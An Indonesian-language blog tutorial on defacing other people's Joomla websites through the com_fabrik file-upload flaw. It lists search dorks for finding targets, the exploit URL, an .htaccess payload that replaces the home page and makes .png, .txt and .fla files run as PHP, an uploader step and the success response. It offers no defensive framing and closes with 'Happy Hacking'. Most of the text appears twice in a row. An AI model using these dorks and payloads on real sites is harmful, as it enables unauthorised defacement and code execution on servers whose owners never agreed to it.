Halo sahabat No Light, di tutorial ini saya akan menjelaskan sebuah cara untuk mendeface website yang menggunakan CMS Joomla. Deface dengan cara ini juga dapat mengganti tampilan halaman home dari sebuah website, mungkin lebih banyak dikenal dengan sebutan tebas index, yang mana file yang kita upload ke server adalah file htaccess.
Deface dengan cara ini mungkin sudah tidak banyak website yang bisa karena kebanyakan fitur uploadnya sudah di-disable dan ada yang sudah update CMS nya ke versi yang terbaru. Untuk mencari website yang memakai CMS Joomla gunakan Dork berikut :
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:com
inurl:index.php?option=com_fabrik&view= site:com
inurl:importcsv.php site:com
Setelah kalian menemukan websitenya, ganti url halaman dengan exploit berikut :
Exploit: /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Sehingga URL nya menjadi seperti ini :
https://websiteku.ru.sak/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Jika kalian menemukan halaman seperti dibawah ini atau mungkin blank, berarti websitenya kemungkinan besar dapat di deface.
Siapkan file halaman deface kalian. Setelah itu kalian buat file *.htaccess dengan isi seperti berikut :
DirectoryIndex zero.html
AddType application/x-httpd-php .png
AddType application/x-httpd-php .txt
AddType application/x-httpd-php .fla
Ganti nama file ( tulisan merah ) dengan file halaman deface kalian sendiri. Upload filenya dengan menggunakan Uploader dibawah ini, masukan target dengan url halaman website + exploitnya seperti ini :
https://websiteku.ru.sak/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
File :
Upload file deface terlebih dahulu dan setelah itu upload file htaccess. Jika kalian berhasil upload file, kalian akan menemukan halaman website dengan direktori file kalian, contohnya seperti ini ( saat upload file htaccess ) :
{"filepath":"\/.htaccess","uri":"http:\/\/websiteku.ru.sak\/.htaccess"}
Itu saja untuk tutorial kali ini semoga bermanfaat dan sampai jumpa pada materi berikutnya. Happy Hacking.
Deface dengan cara ini mungkin sudah tidak banyak website yang bisa karena kebanyakan fitur uploadnya sudah di-disable dan ada yang sudah update CMS nya ke versi yang terbaru. Untuk mencari website yang memakai CMS Joomla gunakan Dork berikut :
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:com
inurl:index.php?option=com_fabrik&view= site:com
inurl:importcsv.php site:com
Setelah kalian menemukan websitenya, ganti url halaman dengan exploit berikut :
Exploit: /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Sehingga URL nya menjadi seperti ini :
https://websiteku.ru.sak/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Jika kalian menemukan halaman seperti dibawah ini atau mungkin blank, berarti websitenya kemungkinan besar dapat di deface.
Siapkan file halaman deface kalian. Setelah itu kalian buat file *.htaccess dengan isi seperti berikut :
DirectoryIndex zero.html
AddType application/x-httpd-php .png
AddType application/x-httpd-php .txt
AddType application/x-httpd-php .fla
Ganti nama file ( tulisan merah ) dengan file halaman deface kalian sendiri. Upload filenya dengan menggunakan Uploader dibawah ini, masukan target dengan url halaman website + exploitnya seperti ini :
https://websiteku.ru.sak/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
CSRF Com_Fabrik File Uploader
Target :File :
Upload file deface terlebih dahulu dan setelah itu upload file htaccess. Jika kalian berhasil upload file, kalian akan menemukan halaman website dengan direktori file kalian, contohnya seperti ini ( saat upload file htaccess ) :
{"filepath":"\/.htaccess","uri":"http:\/\/websiteku.ru.sak\/.htaccess"}
Itu saja untuk tutorial kali ini semoga bermanfaat dan sampai jumpa pada materi berikutnya. Happy Hacking.
0 komentar:
Post a Comment